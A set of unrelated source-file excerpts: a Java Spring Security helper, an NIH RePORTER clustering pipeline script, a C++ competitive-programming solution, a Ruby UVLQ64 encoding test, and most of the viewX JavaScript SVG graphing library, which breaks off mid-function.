			userName = principal.toString();
		}
		return userName;
	}
	/**
	 * Get the granted authorities of the current principal.
	 *
	 * @return the authorities, or null when there is no authentication or the
	 *         principal is not a UserDetails instance
	 */
	public static Collection<? extends GrantedAuthority> getAuthorities(){
		Collection<? extends GrantedAuthority> authorities = null;
		// Guard: an unauthenticated context yields a null Authentication.
		if (SecurityContextHolder.getContext().getAuthentication() == null) {
			return null;
		}
		Object principal = SecurityContextHolder.getContext().getAuthentication().getPrincipal();
		if (principal instanceof UserDetails) {
			UserDetails userDetails = (UserDetails)principal;
			authorities = userDetails.getAuthorities();
		}
		return authorities;
	}
}
|
# End-to-end NIH RePORTER clustering pipeline, run inside a pipenv env.
# Set up virtual environment
pipenv lock --clear
pipenv install
# Set up project directory
pipenv run python setup.py
# Get projects, publications, and citation data
pipenv run python nih_reporter_query.py --search_terms "search_terms.txt" --operator "or" --start_year 1985 --end_year 2021
# Extract features
pipenv run python feature_extraction.py --max_df 0.1 --max_features 1000
# Find k (uncomment if needed)
# pipenv run python find_k.py --trials 5 --max_k 120 --num_features 500
# Run analysis
pipenv run python analyze_clusters.py --k 50 --trials 1
<filename>acmicpc.net/source/1940.cpp
// 1940. 주몽
// 2020.07.03
// 수학
#include<algorithm>
#include<iostream>
#include<vector>
using namespace std;
int main()
{
int n;
int m;
cin >> n >> m;
vector<int> v(n);
for (int i = 0; i < n; i++)
{
cin >> v[i];
}
int ans = 0;
for (int i = 0; i < n; i++)
{
if (v[i] == 0)
{
continue;
}
for (int j = i + 1; j < n; j++)
{
if (v[j] == 0)
{
continue;
}
if (v[i] + v[j] == m)
{
ans++;
v[i] = 0;
v[j] = 0;
break;
}
}
}
cout << ans << endl;
return 0;
}
|
<filename>test/uvlq64_test.rb
require "test_helper"
class UVLQ64Test < Minitest::Test
  # Round-trip a spread of values through the UVLQ64 encoder and decoder,
  # covering small, boundary, zero, and large 64-bit inputs.
  def test_uvlq64_can_encode_and_decode()
    samples = [
      # we use big endian for all this due to uvlq64
      0x7f,
      0x4000,
      0x0,
      0x3ffffe,
      0x1fffff,
      0x200000,
      0x3311a1234df31413
    ]
    samples.each do |value|
      encoded = Wexpr::UVLQ64::write(value)
      refute_equal nil, encoded
      decoded, remainder = Wexpr::UVLQ64::read(encoded)
      refute_equal nil, remainder
      assert_equal value, decoded
    end
  end
end
|
<reponame>prajwalsouza/viewX
//Namespace for the viewX graph helpers. Declared with `var` — the original
//assigned to an undeclared global (and leaked `y`/`temp` as globals too).
var viewX = {
    //Map a graph-space y value onto the default SVG viewport band
    //(graphymax -> 10%, graphymin -> 90%). A degenerate range is widened
    //by 1 on each side and an inverted range is swapped, with a console
    //warning in both cases.
    graphToSvgY: function (value, graphymin, graphymax) {
        if (graphymin == graphymax) {
            graphymin = graphymin - 1
            graphymax = graphymax + 1
            console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphymax + ' and Min value : ' + graphymin)
        }
        if (graphymin > graphymax) {
            var temp = graphymin
            graphymin = graphymax
            graphymax = temp
            console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphymax + ' and Min value : ' + graphymin)
        }
        var y = ((-80)/(graphymax - graphymin))*(value - graphymin) + 90
        return y
    }
}
//Map a graph-space y value to a viewport percentage, compensating for the
//viewport aspect ratio. The range-normalisation below was duplicated
//verbatim in both aspect-ratio branches; it is hoisted to run once, and
//`y`/`temp`/`vl`/`vh` are declared with `var` instead of leaking globally.
viewX.graphToScaledY = function (value, graphymin, graphymax, aspectratio) {
    if (graphymin == graphymax) {
        graphymin = graphymin - 1
        graphymax = graphymax + 1
        console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphymax + ' and Min value : ' + graphymin)
    }
    if (graphymin > graphymax) {
        var temp = graphymin
        graphymin = graphymax
        graphymax = temp
        console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphymax + ' and Min value : ' + graphymin)
    }
    var y
    if(aspectratio > 1) {
        //wide viewport: the fixed 90%..10% band applies directly
        y = ((-80)/(graphymax - graphymin))*(value - graphymin) + 90
    }
    else {
        //tall viewport: shrink the band symmetrically around the centre
        aspectratio = 1/aspectratio
        var vl = (100*(1 - aspectratio)/2) + (10*aspectratio)
        var vh = (100*(aspectratio + 1)/2) - (10*aspectratio)
        y = ((vl - vh)/(graphymax - graphymin))*(value - graphymin) + vh
    }
    return y
}
//Inverse of graphToScaledY: map a viewport percentage back to a
//graph-space y value. As with its counterpart, the duplicated
//range-normalisation is hoisted out of the two branches and the locals
//(`y`, `temp`, `vl`, `vh`) are declared with `var` instead of leaking.
viewX.svgToGraphY = function (percentvalue, graphymin, graphymax, aspectratio) {
    if (graphymin == graphymax) {
        graphymin = graphymin - 1
        graphymax = graphymax + 1
        console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphymax + ' and Min value : ' + graphymin)
    }
    if (graphymin > graphymax) {
        var temp = graphymin
        graphymin = graphymax
        graphymax = temp
        console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphymax + ' and Min value : ' + graphymin)
    }
    var y
    if(aspectratio > 1) {
        //wide viewport: invert the fixed 90%..10% band mapping
        y = ((percentvalue - 90)*(graphymax - graphymin)/((-1)*80)) + graphymin
    }
    else {
        //tall viewport: invert the aspect-scaled band mapping
        aspectratio = 1/aspectratio
        var vl = (100*(1 - aspectratio)/2) + (10*aspectratio)
        var vh = (100*(aspectratio + 1)/2) - (10*aspectratio)
        y = (((percentvalue - vh)*(graphymax - graphymin))/(vl - vh)) + graphymin
    }
    return y
}
//Map a graph-space x value onto the default SVG viewport band
//(graphxmin -> 10%, graphxmax -> 90%). `x`/`temp` are declared with `var`
//instead of leaking as globals; behavior is otherwise unchanged.
viewX.graphToSvgX = function (value, graphxmin, graphxmax) {
    if (graphxmin == graphxmax) {
        graphxmin = graphxmin - 1
        graphxmax = graphxmax + 1
        console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
    }
    if (graphxmin > graphxmax) {
        var temp = graphxmin
        graphxmin = graphxmax
        graphxmax = temp
        console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
    }
    var x = ((80)/(graphxmax - graphxmin))*(value - graphxmin) + 10
    return x
}
//Map a graph-space x value to a viewport percentage, compensating for the
//viewport aspect ratio. The duplicated range-normalisation is hoisted out
//of the two branches and `x`/`temp`/`vl`/`vh` are declared with `var`.
viewX.graphToScaledX = function(value, graphxmin, graphxmax, aspectratio) {
    if (graphxmin == graphxmax) {
        graphxmin = graphxmin - 1
        graphxmax = graphxmax + 1
        console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
    }
    if (graphxmin > graphxmax) {
        var temp = graphxmin
        graphxmin = graphxmax
        graphxmax = temp
        console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
    }
    var x
    if (aspectratio <= 1) {
        //tall-or-square viewport: the fixed 10%..90% band applies directly
        x = ((80)/(graphxmax - graphxmin))*(value - graphxmin) + 10
    }
    else {
        //wide viewport: widen the band symmetrically around the centre
        var vl = (100*(1 - aspectratio)/2) + (10*aspectratio)
        var vh = (100*(aspectratio + 1)/2) - (10*aspectratio)
        x = ((vh - vl)/(graphxmax - graphxmin))*(value - graphxmin) + vl
    }
    return x
}
//Inverse of graphToScaledX: map a viewport percentage back to a
//graph-space x value. The duplicated range-normalisation is hoisted out of
//the two branches and `x`/`temp`/`vl`/`vh` are declared with `var`.
viewX.svgToGraphX = function(percentvalue, graphxmin, graphxmax, aspectratio) {
    if (graphxmin == graphxmax) {
        graphxmin = graphxmin - 1
        graphxmax = graphxmax + 1
        console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
    }
    if (graphxmin > graphxmax) {
        var temp = graphxmin
        graphxmin = graphxmax
        graphxmax = temp
        console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
    }
    var x
    if (aspectratio <= 1) {
        //tall-or-square viewport: invert the fixed 10%..90% band mapping
        x = ((percentvalue - 10)*(graphxmax - graphxmin)/80) + graphxmin
    }
    else {
        //wide viewport: invert the aspect-scaled band mapping
        var vl = (100*(1 - aspectratio)/2) + (10*aspectratio)
        var vh = (100*(aspectratio + 1)/2) - (10*aspectratio)
        x = ((percentvalue - vl)*(graphxmax - graphxmin)/(vh - vl)) + graphxmin
    }
    return x
}
//True when n is a numeric value with no fractional part.
viewX.isInt = function(n){
    var isNumeric = Number(n) === n
    return isNumeric && n % 1 === 0
}
//True when n is a numeric value with a non-zero fractional part.
viewX.isFloat = function(n){
    var isNumeric = Number(n) === n
    return isNumeric && n % 1 !== 0
}
//Pick "nice" major tick values covering [valmin, valmax], aiming for
//roughly `ticksexpected` ticks. The spacing is snapped down to a 1/2/5
//multiple of the appropriate power of ten. All locals are now declared
//with `var` — the original leaked every one of them as a global.
viewX.gridtickvalues = function(valmin, valmax, ticksexpected) {
    //raw spacing in exponential notation, e.g. "2.5e-1"
    var expstring = ((valmax - valmin)/ticksexpected).toExponential()
    var majorgridorder = parseFloat(Math.pow(10 , expstring.slice(expstring.indexOf('e') + 1)))
    //leading digit of the raw spacing, scaled back up by its order
    var majorgriddivision
    if (expstring.indexOf('.') != -1) {
        majorgriddivision = parseFloat(expstring.slice(0, expstring.indexOf('.'))*majorgridorder)
    }
    else {
        majorgriddivision = parseFloat(expstring.slice(0, expstring.indexOf('e'))*majorgridorder)
    }
    //snap down to the largest 1/2/5 multiple not exceeding the raw spacing
    var integerchoices = [1,2,5,10]
    var majorgriddivisionchoice
    for(var choice = 0; choice < integerchoices.length - 1; choice++) {
        if (majorgriddivision < integerchoices[choice + 1]*majorgridorder) {
            majorgriddivisionchoice = majorgridorder*integerchoices[choice]
            break
        }
    }
    //first tick: one spacing below the first multiple at/above valmin when
    //positive, the multiple at/below valmin when negative, else one spacing
    var majorgridstart
    if(valmin > 0) {
        majorgridstart = Math.ceil(valmin/majorgriddivisionchoice)*majorgriddivisionchoice;
        majorgridstart = majorgridstart - majorgriddivisionchoice
    }
    else if(valmin < 0) {
        majorgridstart = Math.floor(valmin/majorgriddivisionchoice)*majorgriddivisionchoice;
    }
    else{
        majorgridstart = majorgriddivisionchoice;
    }
    //walk from the start past valmax by one spacing, collecting ticks
    var majortickvalues = []
    for(var majoraxispoint = majorgridstart; majoraxispoint < (valmax + majorgriddivisionchoice); majoraxispoint = majoraxispoint + majorgriddivisionchoice) {
        majortickvalues.push(majoraxispoint)
    }
    return majortickvalues
}
viewX.updateGraphZoom = function(graphname, newMinMax) {
gdata = viewX.graphData[graphname]
svgElement = gdata.svgElement
if (newMinMax.xmin != 0) {
gdata.xmin = newMinMax.xmin || gdata.xmin
}
else {
gdata.xmin = 0
}
if (newMinMax.xmax != 0) {
gdata.xmax = newMinMax.xmax || gdata.xmax
}
else {
gdata.xmax = 0
}
if (newMinMax.ymin != 0) {
gdata.ymin = newMinMax.ymin || gdata.ymin
}
else {
gdata.ymin = 0
}
if (newMinMax.ymax != 0) {
gdata.ymax = newMinMax.ymax || gdata.ymax
}
else {
gdata.ymax = 0
}
aratio = gdata.aspectratio
if (gdata.unitAspectRatio == 'yes') {
if (gdata.fixAxis == 'yaxis') {
if (gdata.fixAxisStretchCentrally == 'yes') {
centre = (gdata.xmax + gdata.xmin)/2
gdata.xmin = centre - ((gdata.ymax - gdata.ymin)*aratio/2)
gdata.xmax = centre + ((gdata.ymax - gdata.ymin)*aratio/2)
}
else {
gdata.xmax = gdata.xmin + (gdata.ymax - gdata.ymin)*aratio
}
}
else {
if (gdata.fixAxisStretchCentrally == 'yes') {
centre = (gdata.ymax + gdata.ymin)/2
gdata.ymin = centre - ((gdata.xmax - gdata.xmin)*aratio/2)
gdata.ymax = centre + ((gdata.xmax - gdata.xmin)*aratio/2)
}
else {
gdata.ymax = gdata.ymin + (gdata.xmax - gdata.xmin)*aratio
}
}
}
if (gdata.yaxisvisibility == 'yes') {
var lineElement = gdata.yaxisElement
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymin, gdata.ymin, gdata.ymax, aratio) + '%');
if (viewX.darkmode == false) {
lineElement.style.stroke = gdata.yaxiscolor
}
else {
lineElement.style.stroke = 'hsla(0, 0%, 100%, 1)'
}
gdata.yaxisElement = lineElement
}
if (gdata.xaxisvisibility == 'yes') {
var lineElement = gdata.xaxisElement
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.xmin, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + '%');
if (viewX.darkmode == false) {
lineElement.style.stroke = gdata.xaxiscolor
}
else {
lineElement.style.stroke = 'hsla(0, 0%, 100%, 1)'
}
gdata.xaxisElement = lineElement
}
viewX.deleteSegments(gdata.xmajorgridElements)
ticks = gdata.gridlinenumberX
if (gdata.xmajorgridlinesvisibility == 'yes') {
xmajortickvalues = viewX.gridtickvalues(gdata.xmin, gdata.xmax, ticks)
gdata.xmajorgridElements = []
for (m = 0; m < xmajortickvalues.length; m++) {
ticklocation = xmajortickvalues[m]
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
ylength = (gdata.ymax - gdata.ymin)
if (gdata.xmajorgridlinesextension == 'yes') {
lineElement.setAttribute('x1', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymin - (ylength)/2, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymax + (ylength)/2, gdata.ymin, gdata.ymax, aratio) + '%');
}
else {
lineElement.setAttribute('x1', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymin, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('id', gdata.name + '-xmajorgridline-' + m)
}
if (viewX.darkmode == false) {
lineElement.style.stroke = gdata.xmajorgridcolor
}
else {
lineElement.style.stroke = 'hsla(0, 0%, 100%, 1)'
}
lineElement.setAttribute('id', gdata.name + '-xmajorgridline-' + m)
lineElement.style.strokeWidth = gdata.xmajorgridthickness + '%';
gdata.xmajorgridElements.push(lineElement)
svgElement.appendChild(lineElement);
}
gdata.xmajorgridticks = xmajortickvalues
}
viewX.deleteSegments(gdata.ymajorgridElements)
ticks = gdata.gridlinenumberY
if (gdata.ymajorgridlinesvisibility == 'yes') {
ymajortickvalues = viewX.gridtickvalues(gdata.ymin, gdata.ymax, ticks)
gdata.ymajorgridElements = []
for (m = 0; m < ymajortickvalues.length; m++) {
ticklocation = ymajortickvalues[m]
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
xlength = (gdata.xmax - gdata.xmin)
if (gdata.ymajorgridlinesextension == 'yes') {
lineElement.setAttribute('x1', viewX.graphToScaledX((gdata.xmin) - xlength/2, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax + (xlength/2), gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
}
else {
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.xmin, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
}
lineElement.setAttribute('id', gdata.name + '-ymajorgridline-' + m)
if (viewX.darkmode == false) {
lineElement.style.stroke = gdata.ymajorgridcolor
}
else {
lineElement.style.stroke = 'hsla(0, 0%, 100%, 1)'
}
lineElement.setAttribute('id', gdata.name + '-ymajorgridline-' + m)
lineElement.style.strokeWidth = gdata.ymajorgridthickness + '%';
gdata.ymajorgridElements.push(lineElement)
svgElement.appendChild(lineElement);
}
gdata.ymajorgridticks = ymajortickvalues
}
viewX.deleteSegments(gdata.ymajorlabelsElements)
ticks = gdata.gridlinenumberY
if (gdata.ymajorgridlabelvisibility == 'yes') {
gdata.ymajorlabelsElements = []
ymajortickvalues = viewX.gridtickvalues(gdata.ymin, gdata.ymax, ticks)
scale = gdata.ymax - gdata.ymin
expstring = scale.toExponential().toString()
order = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
labelylocationX = gdata.axislocationX
if (viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) < 0) {
labelylocationX = gdata.xmin
}
if (viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) > 100) {
labelylocationX = gdata.xmax
}
for (m = gdata.ylabelexclusionsstart; m < ymajortickvalues.length - gdata.ylabelexclusionsend; m++) {
ticklocation = ymajortickvalues[m]
value = ticklocation
if (eval(gdata.ymajorgridlabelOnlyIf)) {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
if(viewX.isInt(ticklocation)) {
if (gdata.isComplexPlane == 'yes') {
textElement.innerHTML = ticklocation + 'i'
}
else {
textElement.innerHTML = ticklocation
}
}
else {
if (Math.abs(ticklocation) < 0.01 && order > 2) {
ticklocation = ticklocation.toExponential(order)
}
else {
ticklocation = ticklocation.toFixed(order + 1)
}
if (gdata.isComplexPlane == 'yes') {
textElement.innerHTML = ticklocation + 'i'
}
else {
textElement.innerHTML = ticklocation
}
if(ticklocation == 0) {
textElement.innerHTML = 0
}
}
textElement.setAttribute('x', viewX.graphToScaledX(labelylocationX, gdata.xmin, gdata.xmax, aratio) + 0.5 + gdata.ymajorgridlabelshift + '%');
textElement.setAttribute('y',viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + 0.5 + '%');
textElement.setAttribute('id',gdata.name + '-yticklabel-' + m)
textElement.style.fontSize = gdata.fontSize
textElement.style.fontFamily = 'Source Sans Pro'
textElement.style.userSelect = 'none'
// textElement.setAttribute('text-anchor', 'middle')
textElement.style.fill = gdata.ymajorgridlabelcolor
if (viewX.darkmode == false) {
textElement.style.fill = gdata.ymajorgridlabelcolor
}
else {
textElement.style.fill = 'hsla(0, 0%, 100%, 1)'
}
svgElement.appendChild(textElement);
gdata.ymajorlabelsElements.push(textElement)
}
}
}
viewX.deleteSegments(gdata.xmajorlabelsElements)
ticks = gdata.gridlinenumberX
if (gdata.xmajorgridlabelvisibility == 'yes') {
gdata.xmajorlabelsElements = []
xmajortickvalues = viewX.gridtickvalues(gdata.xmin, gdata.xmax, ticks)
scale = gdata.xmax - gdata.xmin
expstring = scale.toExponential().toString()
order = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
labelxlocationY = gdata.axislocationY
if (viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) < 0) {
labelxlocationY = gdata.ymax
}
if (viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) > 100) {
labelxlocationY = gdata.ymin
}
for (m = gdata.xlabelexclusionsstart; m < xmajortickvalues.length - gdata.xlabelexclusionsend; m++) {
ticklocation = xmajortickvalues[m]
value = ticklocation
if (eval(gdata.xmajorgridlabelOnlyIf)) {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
if(viewX.isInt(ticklocation)) {
textElement.innerHTML = ticklocation
}
else {
if (Math.abs(ticklocation) < 0.01 && order > 2) {
ticklocation = ticklocation.toExponential(order)
}
else {
ticklocation = ticklocation.toFixed(order + 1)
}
textElement.innerHTML = ticklocation
if(ticklocation == 0) {
textElement.innerHTML = 0
}
}
transformedXval = viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) - 1
textElement.setAttribute('x', transformedXval + '%');
transformedYval = viewX.graphToScaledY(labelxlocationY, gdata.ymin, gdata.ymax, aratio) + 2 + gdata.xmajorgridlabelshift
textElement.setAttribute('y', transformedYval + '%');
textElement.setAttribute('id',gdata.name + '-xticklabel-' + m)
textElement.style.fontSize = gdata.fontSize
textElement.style.userSelect = 'none'
textElement.setAttribute('text-anchor', 'middle')
if (parseFloat(order) >= 2) {
textElement.setAttribute('transform', 'rotate(90, ' + transformedXval + ', ' + transformedYval + ')')
}
textElement.style.fontFamily = 'Source Sans Pro'
if (viewX.darkmode == false) {
textElement.style.fill = gdata.xmajorgridlabelcolor
}
else {
textElement.style.fill = 'hsla(0, 0%, 100%, 1)'
}
svgElement.appendChild(textElement);
gdata.xmajorlabelsElements.push(textElement)
}
}
}
if (gdata.xaxislabelvisibility == 'yes') {
var textElement = gdata.xaxislabelElement
textElement.setAttribute('x', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + gdata.xaxislabelshift + '%');
textElement.setAttribute('y',viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + 1 + '%');
gdata.xaxislabelElement = textElement
}
if (gdata.yaxislabelvisibility == 'yes') {
var textElement = gdata.yaxislabelElement
textElement.setAttribute('x', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + 0 + '%');
textElement.setAttribute('y',viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) - gdata.yaxislabelshift + '%');
gdata.yaxislabelElement = textElement
}
for (var key in gdata.lineData) {
lineElement = gdata.lineData[key][0]
lineoptions = gdata.lineData[key][1]
lineElement.setAttribute('x1', viewX.graphToScaledX(lineoptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(lineoptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('x2', viewX.graphToScaledX(lineoptions.x2, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(lineoptions.y2, gdata.ymin, gdata.ymax, aratio) + '%');
}
for (var key in gdata.circleData) {
circleElement = gdata.circleData[key][0]
circleoptions = gdata.circleData[key][1]
rx = viewX.distanceBTWgraphToSvg([0,0],[circleoptions.radius, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0,circleoptions.radius], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
circleElement.setAttribute('cx', viewX.graphToScaledX(circleoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
circleElement.setAttribute('cy', viewX.graphToScaledY(circleoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
circleElement.setAttribute('rx', rx + '%')
circleElement.setAttribute('ry', ry + '%');
}
for (var key in gdata.pathData) {
pathElement = gdata.pathData[key][0]
pathoptions = gdata.pathData[key][1]
pathstring = 'M'
for (pth = 0; pth < pathoptions.points.length; pth++) {
if (pth == 0) {
pathstring = pathstring + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
else {
pathstring = pathstring + 'L' + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
}
pathElement.setAttribute('d', pathstring);
}
for (var key in gdata.ellipseData) {
ellipseElement = gdata.ellipseData[key][0]
ellipseoptions = gdata.ellipseData[key][1]
rx = viewX.distanceBTWgraphToSvg([0,0],[ellipseoptions.rx, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, ellipseoptions.ry], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ellipseElement.setAttribute('cx', viewX.graphToScaledX(ellipseoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
ellipseElement.setAttribute('cy', viewX.graphToScaledY(ellipseoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
ellipseElement.setAttribute('rx', rx + '%')
ellipseElement.setAttribute('ry', ry + '%');
}
for (var key in gdata.textData) {
textElement = gdata.textData[key][0]
textoptions = gdata.textData[key][1]
textElement.setAttribute('x', viewX.graphToScaledX(textoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
textElement.setAttribute('y', viewX.graphToScaledY(textoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
}
for (var key in gdata.rectData) {
rectElement = gdata.rectData[key][0]
rectoptions = gdata.rectData[key][1]
rx = viewX.distanceBTWgraphToSvg([0,0],[rectoptions.w, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, rectoptions.h], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
rectElement.setAttribute('x', viewX.graphToScaledX(rectoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
rectElement.setAttribute('y', viewX.graphToScaledY(rectoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
rectElement.setAttribute('width', rx + '%')
rectElement.setAttribute('height', ry + '%');
}
for (var key in gdata.pointData) {
pointElement = gdata.pointData[key][0]
pointoptions = gdata.pointData[key][1]
pointElement.setAttribute('cx', viewX.graphToScaledX(pointoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
pointElement.setAttribute('cy', viewX.graphToScaledY(pointoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
}
for (var key in gdata.arrowData) {
arrowElement = gdata.arrowData[key][0]
arrowoptions = gdata.arrowData[key][1]
arrowFrom = [viewX.graphToScaledX(arrowoptions.from[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.from[1], gdata.ymin, gdata.ymax, aratio)]
arrowTo = [viewX.graphToScaledX(arrowoptions.to[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.to[1], gdata.ymin, gdata.ymax, aratio)]
arrowstring = 'M'
arrowstring = arrowstring + arrowFrom[0] + ' ' + arrowFrom[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowDirectionVector = viewX.directionVec(arrowTo, arrowFrom);
arrowHeadSize = Math.max(3*arrowoptions.strokewidth, 2);
arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, -35);
arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, 35);
arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowElement.setAttribute('d', arrowstring);
}
}
viewX.addGraph = function (parentdiv, name, gdata) {
gdata = gdata || {}
gdata.name = name || 'graph' + Math.random().toString()
if (gdata.axislocationX != 0) {
gdata.axislocationX = gdata.axislocationX || 0
}
else {
